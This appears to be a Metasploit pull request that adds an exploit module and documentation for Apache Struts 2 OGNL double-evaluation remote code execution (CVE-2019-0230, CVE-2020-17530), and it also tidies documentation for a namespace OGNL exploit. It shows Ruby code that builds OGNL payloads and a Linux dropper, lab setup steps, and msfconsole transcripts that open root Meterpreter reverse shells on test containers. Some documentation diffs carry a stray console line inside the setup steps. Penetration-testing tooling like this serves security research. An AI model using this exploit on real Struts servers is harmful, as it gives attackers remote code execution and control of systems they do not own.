### PR TITLE
Struts2 Multi Eval OGNL RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md
+++ b/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md
@@ -1,21 +1,21 @@
-The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain tags
-attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's attributes will be
-rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).
-
-This vulnerability is application dependant. A server side template must make an affected use of request data to render
-an HTML tag attribute.
-
 ## Vulnerable Application
-Vulnerable versions of struts for both CVEs are provided by [vulhub][1] on GitHub. The setup instructions are identical
-for both, just use the provided files in the correct directory. 
+The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags
+attributes such as `id`. It is therefore possible to pass in a value to Structs that will be evaluated again
+when a tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).
+
+This vulnerability is application dependant. A server side template must make use of the data sent in an attacker's
+request to render a HTML tag attribute in order to be vulnerable.
+
+Vulnerable versions of Apache Struts for both CVEs are provided by [vulhub][1] on GitHub. The setup instructions are identical
+for both CVEs, just use the provided files in the correct directory.
 
 1. Use `git` to clone `https://github.com/vulhub/vulhub.git`.
-1. Change directories into the one corresponding to the CVE that should be tested. For CVE-2019-0230, use
+1. Change the current working directory to the one corresponding to the CVE that should be tested. For CVE-2019-0230, use
   `struts2/s2-059` and for CVE-2020-17530, use `struts2/s2-061`.
 1. From within the directory, run `docker-compose up -d`
 1. (OPTIONAL) Run `docker-compose exec struts2 bash` to obtain an interactive shell within the container. This is useful
   for debugging purposes.
-  
+
 * CVE-2019-0230 was patched in 2.5.20
 * CVE-2020-17530 was patched in 2.5.26
 
@@ -52,7 +52,7 @@ Digest: sha256:eaf49b95f2c178cca77d3c8454f79a4fe4ed4dd9d342c9e9a911e842565217d2
 Status: Downloaded newer image for vulhub/struts2:2.5.25
 Creating s2-061_struts2_1 ... done
 [smcintyre@localhost s2-061]$ docker-compose exec struts2 bash
-root@d37b5ab61b87:/usr/src# 
+root@d37b5ab61b87:/usr/src#
 ```
 
 ## Verification Steps
@@ -60,7 +60,8 @@ root@d37b5ab61b87:/usr/src#
 1. Install the vulnerable application, see the "Vulnerable Application" section.
 1. Start `msfconsole`
 1. Do: `use exploit/multi/http/struts2_multi_eval_ognl`
-1. Set the `RHOSTS` and `CVE` options
+1. Set `RHOSTS` to the address of the target(s) to exploit.
+1. Set `CVE` to the ID of the CVE you wish to run against the target: either `CVE-2020-17530` or `CVE-2019-0230`.
 1. Do: `run`
 
 ## Options
@@ -71,26 +72,32 @@ application specific in real world environments. This must be the name of a para
 request to the application that is reflected back as an HTML attribute. The module's `check` method will utilize this
 value to determine if it can be used to evaluate OGNL expressions.
 
+### CVE
+The CVE to try exploit on `RHOSTS`, either `CVE-2020-17530` or `CVE-2019-0230`.
+
+### TARGETURI
+The base path to a valid Structs application on the target machine or machines.
+
 ## Scenarios
 
 ### CVE-2020-17530 From Vulhub
 
 ```
-msf6 > use exploit/multi/http/struts2_multi_eval_ognl 
+msf6 > use exploit/multi/http/struts2_multi_eval_ognl
 [*] No payload configured, defaulting to cmd/unix/reverse_netcat
 msf6 exploit(multi/http/struts2_multi_eval_ognl) > set RHOSTS 192.168.159.128
 RHOSTS => 192.168.159.128
-msf6 exploit(multi/http/struts2_multi_eval_ognl) > set TARGET Linux\ Dropper 
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > set TARGET Linux\ Dropper
 TARGET => Linux Dropper
-msf6 exploit(multi/http/struts2_multi_eval_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
 PAYLOAD => linux/x64/meterpreter/reverse_tcp
-msf6 exploit(multi/http/struts2_multi_eval_ognl) > set LHOST 192.168.159.128 
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > set LHOST 192.168.159.128
 LHOST => 192.168.159.128
 msf6 exploit(multi/http/struts2_multi_eval_ognl) > check
 [*] 192.168.159.128:8080 - The target appears to be vulnerable.
 msf6 exploit(multi/http/struts2_multi_eval_ognl) > exploit
 
-[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Started reverse TCP handler on 192.168.159.128:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [+] The target appears to be vulnerable.
 [*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp using CVE-2020-17530
@@ -113,13 +120,13 @@ meterpreter >
 ### CVE-2019-0230 From Vulhub
 
 ```
-msf6 > use exploit/multi/http/struts2_multi_eval_ognl 
+msf6 > use exploit/multi/http/struts2_multi_eval_ognl
 [*] No payload configured, defaulting to cmd/unix/reverse_netcat
 msf6 exploit(multi/http/struts2_multi_eval_ognl) > set RHOSTS 192.168.159.128
 RHOSTS => 192.168.159.128
-msf6 exploit(multi/http/struts2_multi_eval_ognl) > set CVE CVE-2019-0230 
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > set CVE CVE-2019-0230
 CVE => CVE-2019-0230
-msf6 exploit(multi/http/struts2_multi_eval_ognl) > set TARGET Linux\ Dropper 
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > set TARGET Linux\ Dropper
 TARGET => Linux Dropper
 msf6 exploit(multi/http/struts2_multi_eval_ognl) > set LHOST 192.168.159.128
 LHOST => 192.168.159.128
@@ -127,7 +134,7 @@ msf6 exploit(multi/http/struts2_multi_eval_ognl) > check
 [*] 192.168.159.128:8080 - The target appears to be vulnerable.
 msf6 exploit(multi/http/struts2_multi_eval_ognl) > exploit
 
-[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Started reverse TCP handler on 192.168.159.128:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [+] The target appears to be vulnerable.
 [*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp using CVE-2019-0230
@@ -144,7 +151,7 @@ OS           : Debian 10.5 (Linux 5.9.11-100.fc32.x86_64)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
-meterpreter > 
+meterpreter >
 ```
 
 [1]: https://github.com/vulhub/vulhub

--- a/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md
+++ b/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md
@@ -1,0 +1,150 @@
+The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain tags
+attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's attributes will be
+rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).
+
+This vulnerability is application dependant. A server side template must make an affected use of request data to render
+an HTML tag attribute.
+
+## Vulnerable Application
+Vulnerable versions of struts for both CVEs are provided by [vulhub][1] on GitHub. The setup instructions are identical
+for both, just use the provided files in the correct directory. 
+
+1. Use `git` to clone `https://github.com/vulhub/vulhub.git`.
+1. Change directories into the one corresponding to the CVE that should be tested. For CVE-2019-0230, use
+  `struts2/s2-059` and for CVE-2020-17530, use `struts2/s2-061`.
+1. From within the directory, run `docker-compose up -d`
+1. (OPTIONAL) Run `docker-compose exec struts2 bash` to obtain an interactive shell within the container. This is useful
+  for debugging purposes.
+  
+* CVE-2019-0230 was patched in 2.5.20
+* CVE-2020-17530 was patched in 2.5.26
+
+### Example Setting Up CVE-2020-17530 / S2-061
+
+```
+[smcintyre@localhost ~]$ git clone https://github.com/vulhub/vulhub.git
+Cloning into 'vulhub'...
+remote: Enumerating objects: 234, done.
+remote: Counting objects: 100% (234/234), done.
+remote: Compressing objects: 100% (141/141), done.
+remote: Total 10171 (delta 86), reused 191 (delta 69), pack-reused 9937
+Receiving objects: 100% (10171/10171), 130.98 MiB | 8.36 MiB/s, done.
+Resolving deltas: 100% (4014/4014), done.
+[smcintyre@localhost ~]$ cd vulhub/struts2/s2-061
+[smcintyre@localhost s2-061]$ docker-compose up -d
+Creating network "s2-061_default" with the default driver
+Pulling struts2 (vulhub/struts2:2.5.25)...
+2.5.25: Pulling from vulhub/struts2
+756975cb9c7e: Pull complete
+d77915b4e630: Pull complete
+5f37a0a41b6b: Pull complete
+96b2c1e36db5: Pull complete
+27a2d52b526e: Pull complete
+93a36defce60: Pull complete
+9e2014d79b30: Pull complete
+ac71d4ce2ce4: Pull complete
+a2f817e4badf: Pull complete
+62ac51b7362f: Pull complete
+e12f6705ebbe: Pull complete
+4f4fb700ef54: Pull complete
+97ba98138d72: Pull complete
+Digest: sha256:eaf49b95f2c178cca77d3c8454f79a4fe4ed4dd9d342c9e9a911e842565217d2
+Status: Downloaded newer image for vulhub/struts2:2.5.25
+Creating s2-061_struts2_1 ... done
+[smcintyre@localhost s2-061]$ docker-compose exec struts2 bash
+root@d37b5ab61b87:/usr/src# 
+```
+
+## Verification Steps
+
+1. Install the vulnerable application, see the "Vulnerable Application" section.
+1. Start `msfconsole`
+1. Do: `use exploit/multi/http/struts2_multi_eval_ognl`
+1. Set the `RHOSTS` and `CVE` options
+1. Do: `run`
+
+## Options
+
+### NAME
+The HTTP query parameter or form data name. This option is closely related to the vulnerability and will likely be
+application specific in real world environments. This must be the name of a parameter sent through either a GET or POST
+request to the application that is reflected back as an HTML attribute. The module's `check` method will utilize this
+value to determine if it can be used to evaluate OGNL expressions.
+
+## Scenarios
+
+### CVE-2020-17530 From Vulhub
+
+```
+msf6 > use exploit/multi/http/struts2_multi_eval_ognl 
+[*] No payload configured, defaulting to cmd/unix/reverse_netcat
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > set TARGET Linux\ Dropper 
+TARGET => Linux Dropper
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > set LHOST 192.168.159.128 
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > check
+[*] 192.168.159.128:8080 - The target appears to be vulnerable.
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp using CVE-2020-17530
+[*] Command Stager progress -  44.15% done (362/820 bytes)
+[*] Sending stage (3008420 bytes) to 172.18.0.2
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.18.0.2:46770) at 2020-12-15 19:43:28 -0500
+[*] Command Stager progress - 100.00% done (820/820 bytes)
+
+meterpreter > getuid
+Server username: root @ d37b5ab61b87 (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 172.18.0.2
+OS           : Debian 10.6 (Linux 5.9.11-100.fc32.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+### CVE-2019-0230 From Vulhub
+
+```
+msf6 > use exploit/multi/http/struts2_multi_eval_ognl 
+[*] No payload configured, defaulting to cmd/unix/reverse_netcat
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > set CVE CVE-2019-0230 
+CVE => CVE-2019-0230
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > set TARGET Linux\ Dropper 
+TARGET => Linux Dropper
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > check
+[*] 192.168.159.128:8080 - The target appears to be vulnerable.
+msf6 exploit(multi/http/struts2_multi_eval_ognl) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp using CVE-2019-0230
+[*] Command Stager progress -  44.15% done (362/820 bytes)
+[*] Sending stage (3008420 bytes) to 172.19.0.2
+[*] Command Stager progress - 100.00% done (820/820 bytes)
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.19.0.2:47884) at 2020-12-15 19:47:10 -0500
+
+meterpreter > getuid
+Server username: root @ 91f7855f1eda (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 172.19.0.2
+OS           : Debian 10.5 (Linux 5.9.11-100.fc32.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+[1]: https://github.com/vulhub/vulhub

--- a/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md
+++ b/documentation/modules/exploit/multi/http/struts2_multi_eval_ognl.md
@@ -1,10 +1,10 @@
 ## Vulnerable Application
 The Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags
-attributes such as `id`. It is therefore possible to pass in a value to Structs that will be evaluated again
+attributes such as `id`. It is therefore possible to pass in a value to Struts that will be evaluated again
 when a tag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).
 
-This vulnerability is application dependant. A server side template must make use of the data sent in an attacker's
-request to render a HTML tag attribute in order to be vulnerable.
+This vulnerability is application dependant. A server side template must make an affected use of request data to
+render an HTML tag attribute.
 
 Vulnerable versions of Apache Struts for both CVEs are provided by [vulhub][1] on GitHub. The setup instructions are identical
 for both CVEs, just use the provided files in the correct directory.
@@ -76,7 +76,13 @@ value to determine if it can be used to evaluate OGNL expressions.
 The CVE to try exploit on `RHOSTS`, either `CVE-2020-17530` or `CVE-2019-0230`.
 
 ### TARGETURI
-The base path to a valid Structs application on the target machine or machines.
+The base path to a valid Struts application on the target machine or machines.
+
+### CMDSTAGER::DELAY
+Delay between command executions. Set this value higher if the target tends to be slow to respond.
+
+### HttpCookie
+An optional cookie to include when making the HTTP request.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md
+++ b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md
@@ -10,8 +10,8 @@ As a result of the lack of OGNL output, we currently cannot support large payloa
 
 ## Vulnerable Application
 
-The Struts showcase app, with a slight adaptation to introduce the vulnerability, works reliabliy as a practice environment.
-*@hook-s3c* did an amazing job with [their writeup](https://github.com/hook-s3c/CVE-2018-11776-Python-PoC/blob/master/README.md), which I'll include exerpts of here:
+The Struts showcase app, with a slight adaptation to introduce the vulnerability, works reliably as a practice environment.
+*@hook-s3c* did an amazing job with [their writeup](https://github.com/hook-s3c/CVE-2018-11776-Python-PoC/blob/master/README.md), which I'll include excerpts of here:
 
 1. From a stock Ubuntu VM, install docker:
 
@@ -63,8 +63,7 @@ The Struts showcase app, with a slight adaptation to introduce the vulnerability
     ```
 
 8. Upon completion, the container will shutdown and you'll return to the host environment.  Restart the container, now with a vulnerable endpoint:
-msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
-  
+
     ```
     sudo docker start $CONTAINER_ID
     ```
@@ -81,7 +80,7 @@ echo "Struts container is listening on $IPADDRESS:$PORT_NUM"
 ## Verification Steps
 
   Confirm that check functionality works:
-  
+
   - [ ] Install the application using the steps above.
   - [ ] Start msfconsole.
   - [ ] Load the module: `use exploit/multi/http/struts_namespace_ognl`
@@ -93,7 +92,7 @@ echo "Struts container is listening on $IPADDRESS:$PORT_NUM"
   - [ ] Confirm that the target is vulnerable: `The target is vulnerable.`
 
   Confirm that command execution functionality works:
-  
+
   - [ ] Set a payload: `set PAYLOAD cmd/unix/generic`
   - [ ] Set a command to be run: `set CMD hostname`
   - [ ] Run the exploit: `run`
@@ -101,7 +100,7 @@ echo "Struts container is listening on $IPADDRESS:$PORT_NUM"
   - [ ] You will not be given a shell (yet).
 
   Confirm that payload upload and execution works:
-  
+
   - [ ] Set a payload, e.g.: `set PAYLOAD linux/x64/meterpreter/reverse_tcp`
   - [ ] Configure `LHOST` and `RHOST` as necessary.
   - [ ] Run the exploit: `run`
@@ -147,13 +146,12 @@ msf5 exploit(multi/http/struts_namespace_ognl) > run
 b3d9b350d9b6
 
 [*] Exploit completed, but no session was created.
-msf5 exploit(multi/http/struts_namespace_ognl) > 
+msf5 exploit(multi/http/struts_namespace_ognl) >
 ```
 
 Getting a Meterpreter session on the above-described environment:
 
 ```
-
 msf5 > use exploit/multi/http/struts2_namespace_ognl
 msf5 exploit(multi/http/struts2_namespace_ognl) > set ACTION help.action
 msf5 exploit(multi/http/struts2_namespace_ognl) > set RHOSTS 192.168.199.135
@@ -162,12 +160,12 @@ msf5 exploit(multi/http/struts2_namespace_ognl) > set PAYLOAD linux/x64/meterpre
 msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
 msf5 exploit(multi/http/struts2_namespace_ognl) > run
 
-[*] Started reverse TCP handler on 192.168.199.134:4444 
+[*] Started reverse TCP handler on 192.168.199.134:4444
 [+] Target profiled successfully: Linux 4.4.0-112-generic amd64, running as root
 [+] Payload successfully dropped and executed.
 [*] Sending stage (816260 bytes) to 192.168.199.135
 [*] Meterpreter session 1 opened (192.168.199.134:4444 -> 192.168.199.135:47482) at 2018-08-31 13:15:22 -0500
 
 meterpreter >
-``` 
+```
 

--- a/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md
+++ b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md
@@ -10,90 +10,102 @@ As a result of the lack of OGNL output, we currently cannot support large payloa
 
 ## Vulnerable Application
 
-  The Struts showcase app, with a slight adaptation to introduce the vulnerability, works reliabliy as a practice environment.
-  *@hook-s3c* did an amazing job with [their writeup](https://github.com/hook-s3c/CVE-2018-11776-Python-PoC/blob/master/README.md), which I'll include exerpts of here:
+The Struts showcase app, with a slight adaptation to introduce the vulnerability, works reliabliy as a practice environment.
+*@hook-s3c* did an amazing job with [their writeup](https://github.com/hook-s3c/CVE-2018-11776-Python-PoC/blob/master/README.md), which I'll include exerpts of here:
 
-  1. From a stock Ubuntu VM, install docker:
-  ```
-  sudo apt update && sudo apt install docker.io
-  ```
+1. From a stock Ubuntu VM, install docker:
 
-  2. Download a vulnerable Struts showcase application inside a docker container:
-  ```
-  sudo docker pull piesecurity/apache-struts2-cve-2017-5638
-  sudo docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638
-  CONTAINER_ID=`sudo docker ps -l -q`
-  ```
+    ```
+    sudo apt update && sudo apt install docker.io
+    ```
 
-  3. Now that the container is running, open a terminal inside of it:
-  ```
-  sudo docker exec -it $CONTAINER_ID /bin/bash
-  ```
+2. Download a vulnerable Struts showcase application inside a docker container:
 
-  4. From within the container, install your text editor of choice and modify the Struts configs:
-  ```
-  sudo apt update && sudo apt install nano
-  nano /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml
-  ```
+    ```
+    sudo docker pull piesecurity/apache-struts2-cve-2017-5638
+    sudo docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638
+    CONTAINER_ID=`sudo docker ps -l -q`
+    ```
 
-  5. Update the struts config to add this to above line #11:
-  ```
-  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
-  ```
+3. Now that the container is running, open a terminal inside of it:
 
-  6. Update the same struts config file to add this above line #78:
-  ```
-      <action name="help">
-          <result type="redirectAction">
-              <param name="actionName">date.action</param>
-          </result>
-      </action>
-  ```
+    ```
+    sudo docker exec -it $CONTAINER_ID /bin/bash
+    ```
 
-  7. Still within the container, shutdown the environment:
-  ```
-  /usr/local/tomcat/bin/shutdown.sh
-  ```
+4. From within the container, install your text editor of choice and modify the Struts configs:
 
-  8. Upon completion, the container will shutdown and you'll return to the host environment.  Restart the container, now with a vulnerable endpoint:
+    ```
+    sudo apt update && sudo apt install nano
+    nano /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml
+    ```
+
+5. Update the struts config to add this to above line #11:
+
+    ```
+    &lt;constant name=&quot;struts.mapper.alwaysSelectFullNamespace&quot; value=&quot;true&quot; /&gt;
+    ```
+
+6. Update the same struts config file to add this above line #78:
+
+    ```
+    &lt;action name=&quot;help&quot;&gt;
+        &lt;result type=&quot;redirectAction&quot;&gt;
+            &lt;param name=&quot;actionName&quot;&gt;date.action&lt;/param&gt;
+        &lt;/result&gt;
+    &lt;/action&gt;
+    ```
+
+7. Still within the container, shutdown the environment:
+
+    ```
+    /usr/local/tomcat/bin/shutdown.sh
+    ```
+
+8. Upon completion, the container will shutdown and you'll return to the host environment.  Restart the container, now with a vulnerable endpoint:
 msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
-  ```
-  sudo docker start $CONTAINER_ID
-  ```
+  
+    ```
+    sudo docker start $CONTAINER_ID
+    ```
 
-  Congratulations.  You now have a vulnerable Struts server.  If you're following these instructions, your server should be listening on 0.0.0.0:32771.  To confirm:
-  ```
-  INTERFACE=`ip route list 0.0.0.0/0 | cut -d' ' -f5`
-  IPADDRESS=`ip addr show $INTERFACE | grep -Po 'inet \K[\d.]+'`
-  PORT_NUM=`sudo docker port $CONTAINER_ID | sed 's/.*://'`
-  echo "Struts container is listening on $IPADDRESS:$PORT_NUM"
-  ```
+Congratulations.  You now have a vulnerable Struts server.  If you're following these instructions, your server should be listening on 0.0.0.0:32771.  To confirm:
+
+```
+INTERFACE=`ip route list 0.0.0.0/0 | cut -d' ' -f5`
+IPADDRESS=`ip addr show $INTERFACE | grep -Po 'inet \K[\d.]+'`
+PORT_NUM=`sudo docker port $CONTAINER_ID | sed 's/.*://'`
+echo "Struts container is listening on $IPADDRESS:$PORT_NUM"
+```
 
 ## Verification Steps
 
   Confirm that check functionality works:
+  
   - [ ] Install the application using the steps above.
   - [ ] Start msfconsole.
-  - [ ] Load the module: ```use exploit/multi/http/struts_namespace_ognl```
+  - [ ] Load the module: `use exploit/multi/http/struts_namespace_ognl`
   - [ ] Set the RHOST.
-  - [ ] Set an invalid ACTION: ```set ACTION wrong.action```
-  - [ ] Confirm the target is *not* vulnerable: ```check```
-  - [ ] Observe that the target is *not* vulnerable: ```The target is not exploitable.```
-  - [ ] Set a valid ACTION: ```set ACTION help.action```
-  - [ ] Confirm that the target is vulnerable: ```The target is vulnerable.```
+  - [ ] Set an invalid ACTION: `set ACTION wrong.action`
+  - [ ] Confirm the target is *not* vulnerable: `check`
+  - [ ] Observe that the target is *not* vulnerable: `The target is not exploitable.`
+  - [ ] Set a valid ACTION: `set ACTION help.action`
+  - [ ] Confirm that the target is vulnerable: `The target is vulnerable.`
 
   Confirm that command execution functionality works:
-  - [ ] Set a payload: ```set PAYLOAD cmd/unix/generic```
-  - [ ] Set a command to be run: ```set CMD hostname```
-  - [ ] Run the exploit: ```run```
-  - [ ] Confirm the output is the container ID of your docker environment, e.g: ```b3d9b350d9b6```
+  
+  - [ ] Set a payload: `set PAYLOAD cmd/unix/generic`
+  - [ ] Set a command to be run: `set CMD hostname`
+  - [ ] Run the exploit: `run`
+  - [ ] Confirm the output is the container ID of your docker environment, e.g: `b3d9b350d9b6`
   - [ ] You will not be given a shell (yet).
 
   Confirm that payload upload and execution works:
-  - [ ] Set a payload, e.g.: ```set PAYLOAD linux/x64/meterpreter/reverse_tcp```
+  
+  - [ ] Set a payload, e.g.: `set PAYLOAD linux/x64/meterpreter/reverse_tcp`
   - [ ] Configure `LHOST` and `RHOST` as necessary.
-  - [ ] Run the exploit: ```run```
-msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
+  - [ ] Run the exploit: `run`
+
 ## Options
 
   **TARGETURI**
@@ -108,23 +120,23 @@ msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134
 
 ### Version of software and OS as applicable
 
-  Checking a vulnerable endpoint, as installed in the above steps:
+Checking a vulnerable endpoint, as installed in the above steps:
 
-  ```
-  msf > use exploit/multi/http/struts_namespace_ognl
-  msf5 exploit(multi/http/struts_namespace_ognl) > set RHOSTS 192.168.199.135
-  msf5 exploit(multi/http/struts_namespace_ognl) > set RPORT 32771
-  msf5 exploit(multi/http/struts_namespace_ognl) > set ACTION help.action
-  ACTION => help.action
-  msf5 exploit(multi/http/struts_namespace_ognl) > check
-  [+] 192.168.199.135:32771 The target is vulnerable.
-  ```
+```
+msf > use exploit/multi/http/struts_namespace_ognl
+msf5 exploit(multi/http/struts_namespace_ognl) > set RHOSTS 192.168.199.135
+msf5 exploit(multi/http/struts_namespace_ognl) > set RPORT 32771
+msf5 exploit(multi/http/struts_namespace_ognl) > set ACTION help.action
+ACTION => help.action
+msf5 exploit(multi/http/struts_namespace_ognl) > check
+[+] 192.168.199.135:32771 The target is vulnerable.
+```
 
-  Running an arbitrary command on the above-described environment:
+Running an arbitrary command on the above-described environment:
 
-  ```
-  msf5 exploit(multi/http/struts_namespace_ognl) > set VERBOSE true
-  msf5 exploit(multi/http/struts_namespace_ognl) > set PAYLOAD cmd/unix/generic
+```
+msf5 exploit(multi/http/struts_namespace_ognl) > set VERBOSE true
+msf5 exploit(multi/http/struts_namespace_ognl) > set PAYLOAD cmd/unix/generic
 PAYLOAD => cmd/unix/generic
 msf5 exploit(multi/http/struts_namespace_ognl) > set CMD hostname
 CMD => hostname
@@ -136,9 +148,9 @@ b3d9b350d9b6
 
 [*] Exploit completed, but no session was created.
 msf5 exploit(multi/http/struts_namespace_ognl) > 
-  ```
+```
 
-  Getting a Meterpreter session on the above-described environment:
+Getting a Meterpreter session on the above-described environment:
 
 ```
 

--- a/modules/exploits/multi/http/struts2_double_eval_ognl.rb
+++ b/modules/exploits/multi/http/struts2_double_eval_ognl.rb
@@ -6,22 +6,36 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::EXE
   prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Apache Struts 2 Forced Double OGNL Evaluation',
       'Description'    => %q{
+        The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain
+        tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's
+        attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE).
 
+        This vulnerability is application dependant. A server side template must make an affected use of request data to
+        render an HTML tag attribute.
       },
       'Author'         => [
-        # todo: add the remaining authors
-        'Spencer McIntyre' # Metasploit module
+        'Spencer McIntyre', # Metasploit module
+        'Matthias Kaiser', # discovery of CVE-2019-0230
+        'Alvaro Muñoz', # (@pwntester) discovery of CVE-2020-17530
+        'ka1n4t', # PoC of CVE-2020-17530
       ],
       'References'     => [
-        # todo: add the references
+        ['CVE', '2019-0230'],
+        ['CVE', '2020-17530'],
+        ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-059'],
+        ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-061'],
+        ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-059'],
+        ['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-061'],
+        ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2'],
+        ['URL', 'https://github.com/ka1n4t/CVE-2020-17530'],
       ],
       'Privileged'     => false,
       'Targets'        => [
@@ -32,9 +46,20 @@ class MetasploitModule < Msf::Exploit::Remote
             'Arch' => ARCH_CMD,
             'Type' => :unix_cmd,
           }
+        ],
+        [
+          'Linux Dropper',
+          {
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :linux_dropper,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+            }
+          }
         ]
       ],
-      'DisclosureDate' => '2018-08-22', # todo: set the disclosure date
+      'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date
       'DefaultTarget'  => 0))
 
     register_options([
@@ -43,7 +68,9 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('NAME', [ true, 'The HTTP query parameter or form data name', 'id']),
       OptEnum.new('CVE', [ true, 'Vulnerability to use', 'Automatic', ['Automatic', 'CVE-2020-17530', 'CVE-2019-0230']])
     ])
-     # todo: add an HttpCookie advanced option if necessary
+    register_advanced_options([
+      OptString.new('HttpCookie', [false, 'An optional cookie to include when making the HTTP request'])
+    ])
   end
 
   def check
@@ -68,20 +95,23 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     cve = @cves.first
-    vprint_status("Exploiting #{cve}...")
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']} using #{cve}")
 
-    execute_command(payload.encoded, opts={cve: cve})
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded, {cve: cve})
+    when :linux_dropper
+      execute_cmdstager({cve: cve, linemax: 1024})  # todo: validate this linemax value
+    end
   end
 
   def execute_command(cmd, opts={})
-    res = send_request_cgi(
-      build_http_request(opts[:cve], build_ognl(opts[:cve], cmd))
-    )
-    fail_with(Failure::UnexpectedReply, 'Command execution failed') unless res
+    send_request_cgi(build_http_request(opts[:cve], build_ognl(opts[:cve], cmd)), 5)
   end
 
   def build_http_request(cve, ognl)
     http_request_parameters = { 'uri' => normalize_uri(target_uri.path) }
+    http_request_parameters['cookie'] = datastore['HttpCookie'] unless datastore['HttpCookie'].blank?
     if cve == 'CVE-2019-0230'
       http_request_parameters['method'] = 'GET'
       http_request_parameters['vars_get'] = {datastore['NAME'] => "%{#{ognl}}"}
